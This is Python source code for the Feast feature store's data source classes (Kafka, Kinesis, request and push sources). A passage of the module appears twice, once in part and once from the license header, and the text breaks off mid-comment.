event_timestamp_column: Optional[str] = "", bootstrap_servers: Optional[str] = None, message_format: Optional[StreamFormat] = None, topic: Optional[str] = None, created_timestamp_column: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "bootstrap_servers", "message_format", "topic", ] _name = name _event_timestamp_column = event_timestamp_column _bootstrap_servers = bootstrap_servers or "" _message_format = message_format _topic = topic or "" if args: warnings.warn( ( "Kafka parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct Kafka sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {", ".join(positional_attributes)} are allowed as positional args when defining " f"Kafka sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _bootstrap_servers = args[2] if len(args) >= 4: _message_format = args[3] if len(args) >= 5: _topic = args[4] if _message_format is None: raise ValueError("Message format must be specified for Kafka source") print("Asdfasdf") super().__init__( event_timestamp_column=_event_timestamp_column, created_timestamp_column=created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, name=_name, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kafka_options = KafkaOptions( bootstrap_servers=_bootstrap_servers, message_format=_message_format, topic=_topic, ) def __eq__(self, other): if not isinstance(other, KafkaSource): raise TypeError( "Comparisons should only involve KafkaSource class objects." ) if not super().__eq__(other): return False if ( self.kafka_options.bootstrap_servers != other.kafka_options.bootstrap_servers or self.kafka_options.message_format != other.kafka_options.message_format or self.kafka_options.topic != other.kafka_options.topic ): return False return True def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): return KafkaSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), bootstrap_servers=data_source.kafka_options.bootstrap_servers, message_format=StreamFormat.from_proto( data_source.kafka_options.message_format ), topic=data_source.kafka_options.topic, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KAFKA, field_mapping=self.field_mapping, kafka_options=self.kafka_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: return type_map.redshift_to_feast_value_type def get_table_query_string(self) -> str: raise NotImplementedError class RequestSource(DataSource): """ RequestSource that can be used to provide input features for on demand transforms Args: name: Name of the request data source schema Union[Dict[str, ValueType], List[Field]]: Schema mapping from the input feature name to a ValueType description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the request data source, typically the email of the primary maintainer. """ name: str schema: List[Field] def __init__( self, *args, name: Optional[str] = None, schema: Optional[Union[Dict[str, ValueType], List[Field]]] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """Creates a RequestSource object.""" positional_attributes = ["name", "schema"] _name = name _schema = schema if args: warnings.warn( ( "Request source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct request sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {", ".join(positional_attributes)} are allowed as positional args when defining " f"feature views, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _schema = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _schema: raise ValueError("Schema needs to be provided for Request Source") if isinstance(_schema, Dict): warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. " "Please use List[Field] instead for the schema", DeprecationWarning, ) schemaList = [] for key, valueType in _schema.items(): schemaList.append( Field(name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[valueType]) ) self.schema = schemaList elif isinstance(_schema, List): self.schema = _schema else: raise Exception( "Schema type must be either dictionary or list, not " + str(type(_schema)) ) def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __eq__(self, other): if not isinstance(other, RequestSource): raise TypeError( "Comparisons should only involve RequestSource class objects." ) if not super().__eq__(other): return False if isinstance(self.schema, List) and isinstance(other.schema, List): for field1, field2 in zip(self.schema, other.schema): if field1 != field2: return False return True else: return False def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): deprecated_schema = data_source.request_data_options.deprecated_schema schema_pb = data_source.request_data_options.schema if deprecated_schema and not schema_pb: warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. " "Please use List[Field] instead for the schema", DeprecationWarning, ) dict_schema = {} for key, val in deprecated_schema.items(): dict_schema[key] = ValueType(val) return RequestSource( name=data_source.name, schema=dict_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) else: list_schema = [] for field_proto in schema_pb: list_schema.append(Field.from_proto(field_proto)) return RequestSource( name=data_source.name, schema=list_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: schema_pb = [] if isinstance(self.schema, Dict): for key, value in self.schema.items(): schema_pb.append( Field( name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[value.value] ).to_proto() ) else: for field in self.schema: schema_pb.append(field.to_proto()) data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.REQUEST_SOURCE, description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.request_data_options.schema.extend(schema_pb) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError class RequestDataSource(RequestSource): def __init__(self, *args, **kwargs): warnings.warn( "The 'RequestDataSource' class is deprecated and was renamed to RequestSource. Please use RequestSource instead. This class name will be removed in Feast 0.23.", DeprecationWarning, ) super().__init__(*args, **kwargs) class KinesisSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): return KinesisSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), record_format=StreamFormat.from_proto( data_source.kinesis_options.record_format ), region=data_source.kinesis_options.region, stream_name=data_source.kinesis_options.stream_name, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: pass def get_table_query_string(self) -> str: raise NotImplementedError def __init__( self, *args, name: Optional[str] = None, event_timestamp_column: Optional[str] = "", created_timestamp_column: Optional[str] = "", record_format: Optional[StreamFormat] = None, region: Optional[str] = "", stream_name: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "created_timestamp_column", "record_format", "region", "stream_name", ] _name = name _event_timestamp_column = event_timestamp_column _created_timestamp_column = created_timestamp_column _record_format = record_format _region = region or "" _stream_name = stream_name or "" if args: warnings.warn( ( "Kinesis parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct kinesis sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {", ".join(positional_attributes)} are allowed as positional args when defining " f"kinesis sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _created_timestamp_column = args[2] if len(args) >= 4: _record_format = args[3] if len(args) >= 5: _region = args[4] if len(args) >= 6: _stream_name = args[5] if _record_format is None: raise ValueError("Record format must be specified for kinesis source") super().__init__( name=_name, event_timestamp_column=_event_timestamp_column, created_timestamp_column=_created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kinesis_options = KinesisOptions( record_format=_record_format, region=_region, stream_name=_stream_name ) def __eq__(self, other): if not isinstance(other, KinesisSource): raise TypeError( "Comparisons should only involve KinesisSource class objects." ) if not super().__eq__(other): return False if ( self.kinesis_options.record_format != other.kinesis_options.record_format or self.kinesis_options.region != other.kinesis_options.region or self.kinesis_options.stream_name != other.kinesis_options.stream_name ): return False return True def __hash__(self): return super().__hash__() def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KINESIS, field_mapping=self.field_mapping, kinesis_options=self.kinesis_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto class PushSource(DataSource): """ A source that can be used to ingest features on request """ # TODO(adchia): consider adding schema here in case where Feast manages pushing events to the offline store # TODO(adchia): consider a "mode" to support pushing raw vs transformed events batch_source: DataSource def __init__( self, *args, name: Optional[str] = None, batch_source: Optional[DataSource] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """ Creates a PushSource object. Args: name: Name of the push source batch_source: The batch source that backs this push source. It's used when materializing from the offline store to the online store, and when retrieving historical features. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. """ positional_attributes = ["name", "batch_source"] _name = name _batch_source = batch_source if args: warnings.warn( ( "Push source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct push sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {", ".join(positional_attributes)} are allowed as positional args when defining " f"push sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _batch_source = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _batch_source: raise ValueError( f"batch_source parameter is needed for push source {self.name}" ) self.batch_source = _batch_source def __eq__(self, other): if not isinstance(other, PushSource): raise TypeError("Comparisons should only involve PushSource class objects.") if not super().__eq__(other): return False if self.batch_source != other.batch_source: return False return True def __hash__(self): return super().__hash__() def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): assert data_source.HasField("batch_source") batch_source = DataSource.from_proto(data_source.batch_source) return PushSource( name=data_source.name, batch_source=batch_source, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: batch_source_proto = None if self.batch_source: batch_source_proto = self.batch_source.to_proto() data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.PUSH_SOURCE, description=self.description, tags=self.tags, owner=self.owner, batch_source=batch_source_proto, ) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError
# Copyright 2020 The Feast Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import enum import warnings from abc import ABC, abstractmethod from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union from google.protobuf.json_format import MessageToJson from feast import type_map from feast.data_format import StreamFormat from feast.field import Field from feast.protos.feast.core.DataSource_pb2 import DataSource as DataSourceProto from feast.repo_config import RepoConfig, get_data_source_class_from_type from feast.types import VALUE_TYPES_TO_FEAST_TYPES from feast.value_type import ValueType class SourceType(enum.Enum): """ DataSource value type. Used to define source types in DataSource. """ UNKNOWN = 0 BATCH_FILE = 1 BATCH_BIGQUERY = 2 STREAM_KAFKA = 3 STREAM_KINESIS = 4 BATCH_TRINO = 5 class KafkaOptions: """ DataSource Kafka options used to source features from Kafka messages """ def __init__( self, bootstrap_servers: str, message_format: StreamFormat, topic: str, ): self.bootstrap_servers = bootstrap_servers self.message_format = message_format self.topic = topic @classmethod def from_proto(cls, kafka_options_proto: DataSourceProto.KafkaOptions): """ Creates a KafkaOptions from a protobuf representation of a kafka option Args: kafka_options_proto: A protobuf representation of a DataSource Returns: Returns a BigQueryOptions object based on the kafka_options protobuf """ kafka_options = cls( bootstrap_servers=kafka_options_proto.bootstrap_servers, message_format=StreamFormat.from_proto(kafka_options_proto.message_format), topic=kafka_options_proto.topic, ) return kafka_options def to_proto(self) -> DataSourceProto.KafkaOptions: """ Converts an KafkaOptionsProto object to its protobuf representation. Returns: KafkaOptionsProto protobuf """ kafka_options_proto = DataSourceProto.KafkaOptions( bootstrap_servers=self.bootstrap_servers, message_format=self.message_format.to_proto(), topic=self.topic, ) return kafka_options_proto class KinesisOptions: """ DataSource Kinesis options used to source features from Kinesis records """ def __init__( self, record_format: StreamFormat, region: str, stream_name: str, ): self.record_format = record_format self.region = region self.stream_name = stream_name @classmethod def from_proto(cls, kinesis_options_proto: DataSourceProto.KinesisOptions): """ Creates a KinesisOptions from a protobuf representation of a kinesis option Args: kinesis_options_proto: A protobuf representation of a DataSource Returns: Returns a KinesisOptions object based on the kinesis_options protobuf """ kinesis_options = cls( record_format=StreamFormat.from_proto(kinesis_options_proto.record_format), region=kinesis_options_proto.region, stream_name=kinesis_options_proto.stream_name, ) return kinesis_options def to_proto(self) -> DataSourceProto.KinesisOptions: """ Converts an KinesisOptionsProto object to its protobuf representation. Returns: KinesisOptionsProto protobuf """ kinesis_options_proto = DataSourceProto.KinesisOptions( record_format=self.record_format.to_proto(), region=self.region, stream_name=self.stream_name, ) return kinesis_options_proto _DATA_SOURCE_OPTIONS = { DataSourceProto.SourceType.BATCH_FILE: "feast.infra.offline_stores.file_source.FileSource", DataSourceProto.SourceType.BATCH_BIGQUERY: "feast.infra.offline_stores.bigquery_source.BigQuerySource", DataSourceProto.SourceType.BATCH_REDSHIFT: "feast.infra.offline_stores.redshift_source.RedshiftSource", DataSourceProto.SourceType.BATCH_SNOWFLAKE: "feast.infra.offline_stores.snowflake_source.SnowflakeSource", DataSourceProto.SourceType.BATCH_TRINO: "feast.infra.offline_stores.contrib.trino_offline_store.trino_source.TrinoSource", DataSourceProto.SourceType.BATCH_SPARK: "feast.infra.offline_stores.contrib.spark_offline_store.spark_source.SparkSource", DataSourceProto.SourceType.STREAM_KAFKA: "feast.data_source.KafkaSource", DataSourceProto.SourceType.STREAM_KINESIS: "feast.data_source.KinesisSource", DataSourceProto.SourceType.REQUEST_SOURCE: "feast.data_source.RequestSource", DataSourceProto.SourceType.PUSH_SOURCE: "feast.data_source.PushSource", } class DataSource(ABC): """ DataSource that can be used to source features. Args: name: Name of data source, which should be unique within a project timestamp_field (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional) A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ name: str timestamp_field: str created_timestamp_column: str field_mapping: Dict[str, str] date_partition_column: str description: str tags: Dict[str, str] owner: str def __init__( self, *, event_timestamp_column: Optional[str] = None, created_timestamp_column: Optional[str] = None, field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", name: Optional[str] = None, timestamp_field: Optional[str] = None, ): """ Creates a DataSource object. Args: name: Name of data source, which should be unique within a project event_timestamp_column (optional): (Deprecated) Event timestamp column used for point in time joins of feature values. created_timestamp_column (optional): Timestamp column indicating when the row was created, used for deduplicating rows. field_mapping (optional): A dictionary mapping of column names in this data source to feature names in a feature table or view. Only used for feature columns, not entity or timestamp columns. date_partition_column (optional): Timestamp column used for partitioning. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. timestamp_field (optional): Event timestamp field used for point in time joins of feature values. """ if not name: warnings.warn( ( "Names for data sources need to be supplied. " "Data sources without names will not be supported after Feast 0.23." ), UserWarning, ) self.name = name or "" if not timestamp_field and event_timestamp_column: warnings.warn( ( "The argument 'event_timestamp_column' is being deprecated. Please use 'timestamp_field' instead. " "instead. Feast 0.23 and onwards will not support the argument 'event_timestamp_column' for datasources." ), DeprecationWarning, ) self.timestamp_field = timestamp_field or event_timestamp_column or "" self.created_timestamp_column = ( created_timestamp_column if created_timestamp_column else "" ) self.field_mapping = field_mapping if field_mapping else {} self.date_partition_column = ( date_partition_column if date_partition_column else "" ) self.description = description or "" self.tags = tags or {} self.owner = owner or "" def __hash__(self): return hash((self.name, self.timestamp_field)) def __str__(self): return str(MessageToJson(self.to_proto())) def __eq__(self, other): if other is None: return False if not isinstance(other, DataSource): raise TypeError("Comparisons should only involve DataSource class objects.") if ( self.name != other.name or self.timestamp_field != other.timestamp_field or self.created_timestamp_column != other.created_timestamp_column or self.field_mapping != other.field_mapping or self.date_partition_column != other.date_partition_column or self.description != other.description or self.tags != other.tags or self.owner != other.owner ): return False return True @staticmethod @abstractmethod def from_proto(data_source: DataSourceProto) -> Any: """ Converts data source config in protobuf spec to a DataSource class object. Args: data_source: A protobuf representation of a DataSource. Returns: A DataSource class object. Raises: ValueError: The type of DataSource could not be identified. """ data_source_type = data_source.type if not data_source_type or ( data_source_type not in list(_DATA_SOURCE_OPTIONS.keys()) + [DataSourceProto.SourceType.CUSTOM_SOURCE] ): raise ValueError("Could not identify the source type being added.") if data_source_type == DataSourceProto.SourceType.CUSTOM_SOURCE: cls = get_data_source_class_from_type(data_source.data_source_class_type) return cls.from_proto(data_source) cls = get_data_source_class_from_type(_DATA_SOURCE_OPTIONS[data_source_type]) return cls.from_proto(data_source) @abstractmethod def to_proto(self) -> DataSourceProto: """ Converts a DataSourceProto object to its protobuf representation. """ raise NotImplementedError def validate(self, config: RepoConfig): """ Validates the underlying data source. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError @staticmethod @abstractmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: """ Returns the callable method that returns Feast type given the raw column type. """ raise NotImplementedError def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: """ Returns the list of column names and raw column types. Args: config: Configuration object used to configure a feature store. """ raise NotImplementedError def get_table_query_string(self) -> str: """ Returns a string that can directly be used to reference this table in SQL. """ raise NotImplementedError class KafkaSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __init__( self, *args, name: Optional[str] = None, event_timestamp_column: Optional[str] = "", bootstrap_servers: Optional[str] = None, message_format: Optional[StreamFormat] = None, topic: Optional[str] = None, created_timestamp_column: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "bootstrap_servers", "message_format", "topic", ] _name = name _event_timestamp_column = event_timestamp_column _bootstrap_servers = bootstrap_servers or "" _message_format = message_format _topic = topic or "" if args: warnings.warn( ( "Kafka parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct Kafka sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"Kafka sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _bootstrap_servers = args[2] if len(args) >= 4: _message_format = args[3] if len(args) >= 5: _topic = args[4] if _message_format is None: raise ValueError("Message format must be specified for Kafka source") print("Asdfasdf") super().__init__( event_timestamp_column=_event_timestamp_column, created_timestamp_column=created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, name=_name, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kafka_options = KafkaOptions( bootstrap_servers=_bootstrap_servers, message_format=_message_format, topic=_topic, ) def __eq__(self, other): if not isinstance(other, KafkaSource): raise TypeError( "Comparisons should only involve KafkaSource class objects." ) if not super().__eq__(other): return False if ( self.kafka_options.bootstrap_servers != other.kafka_options.bootstrap_servers or self.kafka_options.message_format != other.kafka_options.message_format or self.kafka_options.topic != other.kafka_options.topic ): return False return True def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): return KafkaSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), bootstrap_servers=data_source.kafka_options.bootstrap_servers, message_format=StreamFormat.from_proto( data_source.kafka_options.message_format ), topic=data_source.kafka_options.topic, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KAFKA, field_mapping=self.field_mapping, kafka_options=self.kafka_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: return type_map.redshift_to_feast_value_type def get_table_query_string(self) -> str: raise NotImplementedError class RequestSource(DataSource): """ RequestSource that can be used to provide input features for on demand transforms Args: name: Name of the request data source schema Union[Dict[str, ValueType], List[Field]]: Schema mapping from the input feature name to a ValueType description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the request data source, typically the email of the primary maintainer. """ name: str schema: List[Field] def __init__( self, *args, name: Optional[str] = None, schema: Optional[Union[Dict[str, ValueType], List[Field]]] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """Creates a RequestSource object.""" positional_attributes = ["name", "schema"] _name = name _schema = schema if args: warnings.warn( ( "Request source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct request sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"feature views, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _schema = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _schema: raise ValueError("Schema needs to be provided for Request Source") if isinstance(_schema, Dict): warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. " "Please use List[Field] instead for the schema", DeprecationWarning, ) schemaList = [] for key, valueType in _schema.items(): schemaList.append( Field(name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[valueType]) ) self.schema = schemaList elif isinstance(_schema, List): self.schema = _schema else: raise Exception( "Schema type must be either dictionary or list, not " + str(type(_schema)) ) def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass def __eq__(self, other): if not isinstance(other, RequestSource): raise TypeError( "Comparisons should only involve RequestSource class objects." ) if not super().__eq__(other): return False if isinstance(self.schema, List) and isinstance(other.schema, List): for field1, field2 in zip(self.schema, other.schema): if field1 != field2: return False return True else: return False def __hash__(self): return super().__hash__() @staticmethod def from_proto(data_source: DataSourceProto): deprecated_schema = data_source.request_data_options.deprecated_schema schema_pb = data_source.request_data_options.schema if deprecated_schema and not schema_pb: warnings.warn( "Schema in RequestSource is changing type. The schema data type Dict[str, ValueType] is being deprecated in Feast 0.23. " "Please use List[Field] instead for the schema", DeprecationWarning, ) dict_schema = {} for key, val in deprecated_schema.items(): dict_schema[key] = ValueType(val) return RequestSource( name=data_source.name, schema=dict_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) else: list_schema = [] for field_proto in schema_pb: list_schema.append(Field.from_proto(field_proto)) return RequestSource( name=data_source.name, schema=list_schema, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: schema_pb = [] if isinstance(self.schema, Dict): for key, value in self.schema.items(): schema_pb.append( Field( name=key, dtype=VALUE_TYPES_TO_FEAST_TYPES[value.value] ).to_proto() ) else: for field in self.schema: schema_pb.append(field.to_proto()) data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.REQUEST_SOURCE, description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.request_data_options.schema.extend(schema_pb) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError class RequestDataSource(RequestSource): def __init__(self, *args, **kwargs): warnings.warn( "The 'RequestDataSource' class is deprecated and was renamed to RequestSource. Please use RequestSource instead. This class name will be removed in Feast 0.23.", DeprecationWarning, ) super().__init__(*args, **kwargs) class KinesisSource(DataSource): def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): return KinesisSource( name=data_source.name, event_timestamp_column=data_source.timestamp_field, field_mapping=dict(data_source.field_mapping), record_format=StreamFormat.from_proto( data_source.kinesis_options.record_format ), region=data_source.kinesis_options.region, stream_name=data_source.kinesis_options.stream_name, created_timestamp_column=data_source.created_timestamp_column, timestamp_field=data_source.timestamp_field, date_partition_column=data_source.date_partition_column, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, batch_source=DataSource.from_proto(data_source.batch_source), ) @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: pass def get_table_query_string(self) -> str: raise NotImplementedError def __init__( self, *args, name: Optional[str] = None, event_timestamp_column: Optional[str] = "", created_timestamp_column: Optional[str] = "", record_format: Optional[StreamFormat] = None, region: Optional[str] = "", stream_name: Optional[str] = "", field_mapping: Optional[Dict[str, str]] = None, date_partition_column: Optional[str] = "", description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", timestamp_field: Optional[str] = "", batch_source: Optional[DataSource] = None, ): positional_attributes = [ "name", "event_timestamp_column", "created_timestamp_column", "record_format", "region", "stream_name", ] _name = name _event_timestamp_column = event_timestamp_column _created_timestamp_column = created_timestamp_column _record_format = record_format _region = region or "" _stream_name = stream_name or "" if args: warnings.warn( ( "Kinesis parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct kinesis sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"kinesis sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _event_timestamp_column = args[1] if len(args) >= 3: _created_timestamp_column = args[2] if len(args) >= 4: _record_format = args[3] if len(args) >= 5: _region = args[4] if len(args) >= 6: _stream_name = args[5] if _record_format is None: raise ValueError("Record format must be specified for kinesis source") super().__init__( name=_name, event_timestamp_column=_event_timestamp_column, created_timestamp_column=_created_timestamp_column, field_mapping=field_mapping, date_partition_column=date_partition_column, description=description, tags=tags, owner=owner, timestamp_field=timestamp_field, ) self.batch_source = batch_source self.kinesis_options = KinesisOptions( record_format=_record_format, region=_region, stream_name=_stream_name ) def __eq__(self, other): if not isinstance(other, KinesisSource): raise TypeError( "Comparisons should only involve KinesisSource class objects." ) if not super().__eq__(other): return False if ( self.kinesis_options.record_format != other.kinesis_options.record_format or self.kinesis_options.region != other.kinesis_options.region or self.kinesis_options.stream_name != other.kinesis_options.stream_name ): return False return True def __hash__(self): return super().__hash__() def to_proto(self) -> DataSourceProto: data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.STREAM_KINESIS, field_mapping=self.field_mapping, kinesis_options=self.kinesis_options.to_proto(), description=self.description, tags=self.tags, owner=self.owner, ) data_source_proto.timestamp_field = self.timestamp_field data_source_proto.created_timestamp_column = self.created_timestamp_column data_source_proto.date_partition_column = self.date_partition_column if self.batch_source: data_source_proto.batch_source.MergeFrom(self.batch_source.to_proto()) return data_source_proto class PushSource(DataSource): """ A source that can be used to ingest features on request """ # TODO(adchia): consider adding schema here in case where Feast manages pushing events to the offline store # TODO(adchia): consider a "mode" to support pushing raw 